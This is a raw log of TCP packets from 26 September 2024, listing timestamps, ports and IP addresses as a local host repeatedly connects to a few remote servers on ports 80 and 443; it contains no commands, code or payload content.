Sep 26, 2024 09:00:26.592598915 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:26.592669964 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:26.592924118 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:26.592941046 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:26.637821913 CEST	49723	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:27.061793089 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:27.063643932 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:27.063678026 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:27.207600117 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:27.207894087 CEST	443	49724	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:27.207989931 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:27.208304882 CEST	49724	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:27.211456060 CEST	49723	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:27.212332010 CEST	49725	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:27.216609001 CEST	80	49723	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:27.216675043 CEST	49723	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:27.217200994 CEST	80	49725	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:27.217274904 CEST	49725	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:27.217349052 CEST	49725	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:27.222137928 CEST	80	49725	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:28.037694931 CEST	80	49725	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:28.046140909 CEST	49726	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:28.046189070 CEST	443	49726	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:28.046255112 CEST	49726	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:28.046509027 CEST	49726	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:28.046520948 CEST	443	49726	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:28.090854883 CEST	49725	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:28.517095089 CEST	443	49726	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:28.519165993 CEST	49726	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:28.519196987 CEST	443	49726	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:28.659960985 CEST	443	49726	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:28.660231113 CEST	443	49726	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:28.660340071 CEST	49726	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:28.660715103 CEST	49726	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:28.664254904 CEST	49725	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:28.665601015 CEST	49727	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:28.669670105 CEST	80	49725	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:28.669728994 CEST	49725	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:28.670491934 CEST	80	49727	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:28.670563936 CEST	49727	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:28.670629978 CEST	49727	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:28.675421000 CEST	80	49727	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:29.300753117 CEST	80	49709	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:29.300945997 CEST	49709	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:29.308425903 CEST	49709	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:29.313282013 CEST	80	49709	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:29.316431999 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:29.321280003 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:29.321356058 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:29.322633982 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:29.327425003 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:29.583796978 CEST	80	49727	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:29.585462093 CEST	49729	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:29.585560083 CEST	443	49729	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:29.585690022 CEST	49729	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:29.585954905 CEST	49729	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:29.586005926 CEST	443	49729	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:29.637737036 CEST	49727	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:30.074954033 CEST	443	49729	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:30.076841116 CEST	49729	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:30.076901913 CEST	443	49729	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:31.186881065 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.187100887 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.187155962 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.187237024 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.187283039 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.187566996 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.187613010 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.187642097 CEST	443	49729	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:31.187900066 CEST	443	49729	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:31.187973976 CEST	49729	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:31.188527107 CEST	49729	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:31.191270113 CEST	49727	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.191414118 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.192265987 CEST	49730	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.371274948 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.371285915 CEST	80	49730	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.371298075 CEST	80	49727	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.371475935 CEST	49727	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.371506929 CEST	49730	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.371680975 CEST	49730	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.376482964 CEST	80	49730	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.659435987 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:31.700265884 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:31.702850103 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:31.702886105 CEST	443	49731	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:31.702960968 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:31.708050013 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:31.708065987 CEST	443	49731	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:32.178970098 CEST	443	49731	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:32.179065943 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:32.180454016 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:32.180459023 CEST	443	49731	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:32.180841923 CEST	443	49731	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:32.231535912 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:32.240422010 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:32.283401012 CEST	443	49731	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:32.345925093 CEST	443	49731	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:32.346061945 CEST	443	49731	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:32.346239090 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:32.348372936 CEST	49731	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:32.352539062 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:32.353892088 CEST	49732	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:32.357784033 CEST	80	49728	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:32.357892990 CEST	49728	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:32.358755112 CEST	80	49732	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:32.358861923 CEST	49732	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:32.358943939 CEST	49732	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:32.363730907 CEST	80	49732	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:33.312611103 CEST	80	49730	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:33.314266920 CEST	49733	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:33.314299107 CEST	443	49733	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:33.314371109 CEST	49733	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:33.314626932 CEST	49733	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:33.314644098 CEST	443	49733	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:33.356607914 CEST	49730	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:33.793122053 CEST	443	49733	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:33.795059919 CEST	49733	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:33.795080900 CEST	443	49733	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:33.948538065 CEST	443	49733	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:33.948684931 CEST	443	49733	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:33.948868036 CEST	49733	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:33.949345112 CEST	49733	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:33.952297926 CEST	49730	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:33.953243971 CEST	49734	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:33.957653046 CEST	80	49730	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:33.958133936 CEST	80	49734	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:33.958208084 CEST	49730	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:33.958230019 CEST	49734	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:33.958314896 CEST	49734	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:33.963155985 CEST	80	49734	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:34.752504110 CEST	80	49732	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:34.753823996 CEST	49735	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:34.753858089 CEST	443	49735	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:34.753927946 CEST	49735	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:34.754173040 CEST	49735	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:34.754188061 CEST	443	49735	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:34.794104099 CEST	49732	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.181936026 CEST	80	49734	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:35.197786093 CEST	49736	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.197873116 CEST	443	49736	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.197964907 CEST	49736	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.204590082 CEST	49736	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.204646111 CEST	443	49736	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.231528044 CEST	49734	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.236882925 CEST	443	49735	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.251136065 CEST	49735	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.251161098 CEST	443	49735	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.367870092 CEST	443	49735	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.368103981 CEST	443	49735	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.368294001 CEST	49735	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.368963003 CEST	49735	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.373733997 CEST	49732	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.375433922 CEST	49737	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.378964901 CEST	80	49732	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:35.379051924 CEST	49732	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.380297899 CEST	80	49737	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:35.380399942 CEST	49737	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.380506039 CEST	49737	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.385261059 CEST	80	49737	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:35.676748037 CEST	443	49736	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.678854942 CEST	49736	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.678924084 CEST	443	49736	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.797585011 CEST	443	49736	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.797821999 CEST	443	49736	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:35.797913074 CEST	49736	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.798182011 CEST	49736	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:35.811898947 CEST	49734	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.817184925 CEST	80	49734	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:35.817244053 CEST	49734	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:35.820147038 CEST	49738	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:35.820168972 CEST	443	49738	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:35.820229053 CEST	49738	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:35.820660114 CEST	49738	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:35.820672035 CEST	443	49738	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:36.454370022 CEST	443	49738	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:36.454472065 CEST	49738	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:36.458079100 CEST	49738	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:36.458086967 CEST	443	49738	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:36.458477974 CEST	443	49738	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:36.459850073 CEST	49738	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:36.507395029 CEST	443	49738	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:36.696479082 CEST	443	49738	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:36.696562052 CEST	443	49738	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:36.696630001 CEST	49738	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:36.700833082 CEST	49738	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:37.207117081 CEST	80	49737	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:37.208458900 CEST	49739	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:37.208534956 CEST	443	49739	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:37.208623886 CEST	49739	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:37.208868980 CEST	49739	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:37.208895922 CEST	443	49739	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:37.262764931 CEST	49737	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:37.687432051 CEST	443	49739	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:37.731585979 CEST	49739	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:37.868921041 CEST	49739	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:37.868947029 CEST	443	49739	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:37.983294010 CEST	443	49739	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:37.983571053 CEST	443	49739	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:37.983647108 CEST	49739	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:37.983912945 CEST	49739	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:37.987278938 CEST	49737	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:37.988571882 CEST	49740	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:37.994092941 CEST	80	49737	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:37.994132996 CEST	80	49740	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:37.994174004 CEST	49737	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:37.994242907 CEST	49740	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:37.994319916 CEST	49740	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:37.999066114 CEST	80	49740	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:39.521365881 CEST	80	49740	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:39.522089958 CEST	80	49740	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:39.522151947 CEST	49740	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:39.522233963 CEST	80	49740	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:39.522285938 CEST	49740	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:39.523498058 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:39.523533106 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:39.523606062 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:39.523883104 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:39.523896933 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:39.985843897 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:39.987416029 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:39.987452984 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:40.133264065 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:40.133507967 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:40.133570910 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:40.133984089 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:40.137056112 CEST	49740	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:40.138206959 CEST	49742	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:40.142151117 CEST	80	49740	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:40.142435074 CEST	49740	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:40.143062115 CEST	80	49742	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:40.143291950 CEST	49742	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:40.143291950 CEST	49742	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:40.148133993 CEST	80	49742	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:41.103173971 CEST	80	49742	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:41.104665995 CEST	49743	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:41.104708910 CEST	443	49743	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:41.104784012 CEST	49743	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:41.105056047 CEST	49743	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:41.105068922 CEST	443	49743	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:41.153367043 CEST	49742	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:41.571161032 CEST	443	49743	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:41.573292017 CEST	49743	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:41.573334932 CEST	443	49743	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:41.702152014 CEST	443	49743	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:41.702379942 CEST	443	49743	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:41.702475071 CEST	49743	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:41.702852964 CEST	49743	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:41.706209898 CEST	49742	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:41.707640886 CEST	49744	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:41.711452007 CEST	80	49742	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:41.711592913 CEST	49742	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:41.712596893 CEST	80	49744	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:41.712702990 CEST	49744	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:41.712762117 CEST	49744	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:41.717561960 CEST	80	49744	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:43.409209013 CEST	80	49744	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:43.410532951 CEST	49745	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:43.410583019 CEST	443	49745	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:43.410690069 CEST	49745	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:43.410962105 CEST	49745	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:43.410975933 CEST	443	49745	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:43.453084946 CEST	49744	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:43.876061916 CEST	443	49745	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:43.878904104 CEST	49745	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:43.878936052 CEST	443	49745	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:44.005330086 CEST	443	49745	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:44.005599976 CEST	443	49745	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:44.005672932 CEST	49745	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:44.006167889 CEST	49745	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:44.009555101 CEST	49744	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:44.011073112 CEST	49746	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:44.014761925 CEST	80	49744	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:44.014846087 CEST	49744	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:44.015995026 CEST	80	49746	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:44.016088963 CEST	49746	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:44.016186953 CEST	49746	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:44.021028042 CEST	80	49746	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:44.908319950 CEST	80	49746	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:44.909492016 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:44.909545898 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:44.909672022 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:44.910073996 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:44.910089016 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:44.950287104 CEST	49746	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:45.371126890 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:45.372953892 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:45.372987986 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:45.502477884 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:45.502757072 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:45.502893925 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:45.503503084 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:45.506681919 CEST	49746	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:45.507924080 CEST	49748	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:45.511949062 CEST	80	49746	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:45.512023926 CEST	49746	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:45.514250994 CEST	80	49748	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:45.514386892 CEST	49748	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:45.514446020 CEST	49748	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:45.519289017 CEST	80	49748	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:46.922441959 CEST	80	49748	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:46.922502995 CEST	80	49748	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:46.922534943 CEST	80	49748	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:46.922610044 CEST	49748	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:46.922610044 CEST	49748	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:46.923640966 CEST	49749	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:46.923688889 CEST	443	49749	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:46.923897028 CEST	49749	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:46.924233913 CEST	49749	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:46.924247980 CEST	443	49749	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:47.412817955 CEST	443	49749	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:47.414494038 CEST	49749	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:47.414519072 CEST	443	49749	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:47.551800966 CEST	443	49749	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:47.551938057 CEST	443	49749	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:47.552001953 CEST	49749	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:47.552524090 CEST	49749	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:47.555146933 CEST	49748	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:47.556248903 CEST	49750	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:47.560632944 CEST	80	49748	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:47.560703993 CEST	49748	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:47.561391115 CEST	80	49750	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:47.561463118 CEST	49750	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:47.561557055 CEST	49750	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:47.566324949 CEST	80	49750	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:48.374665022 CEST	80	49750	132.226.8.169	192.168.2.5
Sep 26, 2024 09:00:48.376004934 CEST	49751	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:48.376070976 CEST	443	49751	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:48.376158953 CEST	49751	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:48.376535892 CEST	49751	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:48.376565933 CEST	443	49751	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:48.418997049 CEST	49750	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:00:48.868694067 CEST	443	49751	188.114.96.3	192.168.2.5
